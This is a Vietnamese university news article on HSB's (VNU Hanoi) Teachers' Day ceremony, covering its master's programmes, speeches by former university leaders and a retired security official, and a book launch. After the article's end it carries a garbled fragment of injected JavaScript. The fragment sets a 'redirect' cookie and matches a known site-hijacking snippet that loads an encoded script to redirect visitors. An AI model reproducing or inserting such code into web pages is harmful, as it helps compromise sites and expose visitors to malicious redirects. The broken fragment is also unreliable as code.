Thiep20.11Sáng ngày 20.11, tại giảng đường Chu Văn An, Khoa Quản trị Kinh Doanh (HSB) thuộc Đại học Quốc gia Hà Nội (VNU) đã trang trọng tổ chức lễ kỉ niệm Ngày Nhà giáo Việt Nam với sự tham gia của Ban Chủ nhiệm khoa, các giảng viên, toàn thể cán bộ, nhân viên và đông đảo các học viên và cựu học viên.

HSB trang trọng kỉ niệm Ngày nhà giáo Việt Nam 20.11

Đặc biệt, HSB còn vinh dự được đón tiếp các nhà giáo, nhà quản lý và thành viên Hội đồng KH-ĐT HSB: GS.TSKH. Mai Trọng Nhuận, nguyên Giám đốc ĐHQGHN; GS.TSKH. Vũ Minh Giang, nguyên Phó Giám đốc ĐHQGHN; Thượng tướng, tiến sỹ Nguyễn Văn Hưởng, nguyên Thứ trưởng Bộ Công an. .

Nhân dịp này, thầy và trò của HSB đã ôn lại chặng đường phát triển gần 20 năm của HSB, điểm lại những thành tựu đã đạt được trong việc thực hiện chiến lược phát triển bền vững thương hiệu quốc tế HSB.

Trong năm học 2014-2105, HSB đã tổ chức tuyển sinh thành công cho hai chương trình đào tạo Thạc sỹ. Thứ nhất là chương trình Thạc sỹ Quản trị Kinh doanh (HSB-MBA) khóa 09, tiếp nối và đổi mới từ chương trình của 08 khóa trước đây. Thứ hai là chương trình Thạc sỹ Quản trị An ninh Phi truyền thống (MNS), chương trình đào tạo mới và liên ngành đầu tiên của Việt Nam và khu vực. Đây là những việc làm thiết thực và có hiệu quả trong việc thực hiện chủ trương của Đảng về đổi mới căn bản và toàn diện giáo dục Việt Nam.

1

PGS.TS. Hoàng Đình Phi, Chủ nhiệm Khoa phát biểu khai mạc, điểm lại hoạt động của Khoa trong thời gian qua và kế hoạch hành động trong thời gian tới

Bên cạnh các chương trình đào tạo chính quy dài hạn, HSB tiếp tục khẳng định là một thương hiệu uy tín của Việt Nam và khu vực trong lĩnh vực tư vấn và đào tạo về kinh doanh và quản trị cho các tổ chức và doanh nghiệp. Trong hợp tác đào tạo quốc tế. HSB là đơn vị của Việt Nam được nhiều đại học hàng đầu thế giới tin cậy giao cho thực hiện các chương trình đào tạo tín chỉ quốc tế cho sinh viên các năm cuối của ĐH Đại học Công nghệ Nanyang, Singapore (NTU), ĐH NUS, Singapore.

2

Các sinh viên Đại học công nghệ Nanyang, Singapore học tập, nghiên cứu tại HSB

Thay mặt Hội đồng khoa học của khoa, GS.TSKH. Vũ Minh Giang đã phân tích những cơ hội và thách thức trong hoạt động đào tạo của HSB trong thời gian tới. Điểm nội bật trong hoạt động đào tạo của HSB, GS.TSKH. Vũ Minh Giang nhấn mạnh, là luôn gắn chặt và góp phần thiết thực vào việc cụ thể hóa các chủ trương, nghị quyết của TW Đảng về các vấn đề như đổi mới căn bản và toàn diện giáo dục, và bảo vệ tổ quốc trong tình hình mới … thông qua áp dụng cách tiếp cận liên ngành. Minh chứng sinh động nhất là khoa đã phát triển và bước vào tổ chức thực hiện chương trình đào tạo về quản trị an ninh phi truyền thống.

3

GS.TSKH. Vũ Minh Giang, Chủ tịch Hội đồng khoa học của ĐHQG nhấn mạnh về tính liên ngành trong các chương trình đào tạo của HSB

Là một nhà quản lý, chuyên gia đồng thời là nhà giáo có nhiều kinh nghiệm trong công tác đảm bảo an ninh, Thượng tướng, tiến sỹ Nguyễn Văn Hưởng đã dành nhiều tâm huyết tham gia cùng với nhóm tác giả trong quá trình sáng tạo, thiết kế và giảng dạy cho chương trình Thạc sỹ Quản trị An ninh phi truyền thống tại HSB. Trước các thách thức “phi truyền thống” như biến đổi khí khậu, môi trường, lương thực, sức khỏe, công nghệ thông tin, tôn giáo… chương trình đào tạo MNS, như lời Thượng tướng, tiến sỹ Nguyễn Văn Hưởng phát biểu, là cần thiết không chỉ cho cán bộ các ngành quân đội, an ninh mà còn tất cả các ngành nghề, lĩnh vực khác trong xã hội; không chỉ cho Việt Nam mà còn cho cả các nước trong khu vực. Nhân dịp này, Thượng tướng, tiến sỹ Nguyễn Văn Hưởng và HSB cũng công bố cuốn sách chuyên khảo quan trọng về an ninh phi truyền thống được sử dụng cho các chương trình giảng dạy tại HSB.

                      IMG 3867IMG 3860

GS.Thượng tướng Nguyễn Văn Hưởng trao tặng sách về an ninh phi truyền thống cho các giảng viên, nghiên cứu viên trẻ của HSB

Với bề dày truyền thống gần 20 năm phát triển, HSB hiện có trên 10 ngàn học viên và cựu học viên, nhiều người trong số đó hiện đang nắm giữ những trọng trách trong các cơ quan của Đảng, Chính phủ, Bộ ngành, địa phương, các doanh nghiệp và các tổ chức xã hội. Trong dịp kỉ niệm Ngày nhà giáo Việt Nam, đông đảo học viên và cựu học viên của HSB đã về dự và bày tỏ lòng tri ân với các thầy cô trong khoa.

5

Đại diện Câu lạc cựu học viên HSB-AC và học viên các lớp HSB-MBA, MNS khóa 2014-2016 phát biểu và tặng hoa các thầy cô

Lễ kỉ niệm Ngày nhà giáo Việt Nam của HSB diễn ra và kết thúc trong không khí đầm ấm, trang trọng và tràn đầy niềm tin vào sự phát triển bền vững của khoa trong thời gian tới.

IMG 3887

HSB-News

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}